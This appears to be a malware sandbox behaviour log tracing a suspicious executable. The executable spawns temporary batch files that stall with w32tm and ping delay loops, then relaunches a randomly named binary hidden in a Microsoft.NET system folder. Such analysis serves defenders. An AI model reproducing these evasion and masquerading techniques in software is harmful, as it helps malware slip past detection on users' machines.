File read: C:\Users\user\Desktop\yQrCGtNgsf.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\yQrCGtNgsf.exe "C:\Users\user\Desktop\yQrCGtNgsf.exe"
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9eKXf9oU9J.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\77a9gOcAJB.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6C8kMSA4ag.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\mzBmoeLRKc.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\F0qtrCuOKA.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uw07fWAZe6.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9VsmEYMPZS.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\mpHYiEZ4vY.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9eKXf9oU9J.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\77a9gOcAJB.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\6C8kMSA4ag.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\mzBmoeLRKc.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\F0qtrCuOKA.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uw07fWAZe6.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\9VsmEYMPZS.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\mpHYiEZ4vY.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe "C:\Program Files (x86)\microsoft.net\RedistList\JPOyDhPFIytu.exe"
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\riciCmDgnt.bat"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2

Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\yQrCGtNgsf.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\w32tm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dlnashext.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wpdshext.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: ulib.dll	Jump to behavior
Source: C:\Windows\System32\chcp.com	Section loaded: fsutilext.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ktmw32.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Program Files (x86)\Microsoft.NET\RedistList\JPOyDhPFIytu.exe	Section loaded: dnsapi.dll	Jump to behavior
